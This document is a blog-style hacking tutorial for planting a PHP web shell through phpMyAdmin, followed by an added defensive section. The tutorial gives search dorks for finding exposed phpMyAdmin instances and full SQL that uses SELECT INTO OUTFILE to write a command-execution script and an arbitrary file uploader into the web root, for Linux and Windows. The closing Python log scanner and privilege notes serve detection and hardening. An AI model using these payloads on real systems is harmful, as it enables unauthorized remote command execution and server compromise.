Sunday, 03 November 2013

How to Upload a Shell via phpMyAdmin

dork:
inurl:/security/security.php
inurl:/phpmyadmin/index.php
etc., just use your own logic...

Once the target has been found, we begin:

UPDATE:

I have also tried this on localhost.
The phpMyAdmin I used is the one bundled with LAMPP (Linux), version 3.2.4.

Open phpMyAdmin, then choose the SQL menu.

Then enter the SQL script in the form provided:
*For Linux machines


Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*For Windows machines
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Click Go!

Note: If XAMPP is installed in a different directory, change the path in the line SELECT * INTO OUTFILE '<path to XAMPP htdocs>/cmd.php' from temptab;

Assume the result looks like this:
Your SQL Query has been executed successful

That means the file cmd.php can now be opened: go to http://localhost/cmd.php?cmd=<OS command (Linux or Windows)>
Example: http://localhost/cmd.php?cmd=ls <-- ls is the command for listing files and directories on a Linux machine; on Windows use dir.

Moving on!
Open phpMyAdmin again, then choose the SQL menu.

Then enter the SQL script in the form provided:
*For Linux machines
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*For Windows machines
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Then click Go!

Once more, open phpMyAdmin, then choose the SQL menu.

Then enter the SQL script in the form provided:
*For Linux machines
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

*For Windows machines
Code:
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Then click Go!
Assuming that succeeded, now open http://localhost/form.php

Upload the shell, or a .php, .html, .htm, .txt file, and so on.
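
From the defender's side, every variant in this post leaves the same trace: a SELECT ... INTO OUTFILE statement that targets a script file under the web root. The following is an added example (not part of the original post) that scans MySQL general query log lines for that pattern; the log lines are constructed, the log format is simplified, it assumes the general query log is enabled, and WEB_ROOTS, SCRIPT_EXT and scan_query_log are names chosen for this illustration.

```python
import re

# Assumed document roots (the two paths from the post plus a common default).
WEB_ROOTS = ("/opt/lampp/htdocs", "c:/xampp/htdocs", "/var/www")
# Extensions a web server typically hands to an interpreter.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")

OUTFILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(.+?)\2", re.I)
INSERT_RE = re.compile(r"\bINSERT\b", re.I)
CODE_TAG_RE = re.compile(r"<\?(php|=|\s)|<%", re.I)

# Constructed general-query-log lines (timestamp, thread id, command, statement).
SAMPLE_LOG = [
    "131103  9:10:02\t   11 Query\tSELECT id, total INTO OUTFILE '/var/lib/mysql-files/report.csv' FROM orders",
    "131103  9:19:01\t   12 Query\tCREATE TABLE temptab (codetab text)",
    "131103  9:19:01\t   12 Query\tINSERT INTO temptab (codetab) values ('<? /* payload elided */ ?>')",
    "131103  9:19:02\t   12 Query\tSELECT * INTO OUTFILE '/opt/lampp/htdocs/cmd.php' from temptab",
    "131103  9:19:02\t   12 Query\tDROP TABLE temptab",
]


def scan_query_log(lines):
    """Flag statements that export query results to a file, ranked by risk."""
    findings = []
    code_inserted = False  # crude correlation: whole log, not per connection
    for lineno, line in enumerate(lines, 1):
        if INSERT_RE.search(line) and CODE_TAG_RE.search(line):
            code_inserted = True
        match = OUTFILE_RE.search(line)
        if not match:
            continue
        path = match.group(3).replace("\\\\", "/").replace("\\", "/")
        lower = path.lower()
        reasons = []
        if lower.startswith(WEB_ROOTS):
            reasons.append("web-root")
        if lower.endswith(SCRIPT_EXT):
            reasons.append("script-extension")
        if code_inserted:
            reasons.append("preceded-by-code-insert")
        if "web-root" in reasons and "script-extension" in reasons:
            severity = "high"
        else:
            severity = "medium" if reasons else "info"
        findings.append({"line": lineno, "path": path,
                         "severity": severity, "reasons": reasons})
        code_inserted = False
    return findings
```

The write only succeeds when the MySQL account holds the FILE privilege, secure_file_priv does not restrict export paths, and the database service account can write to the document root; removing any one of these blocks it.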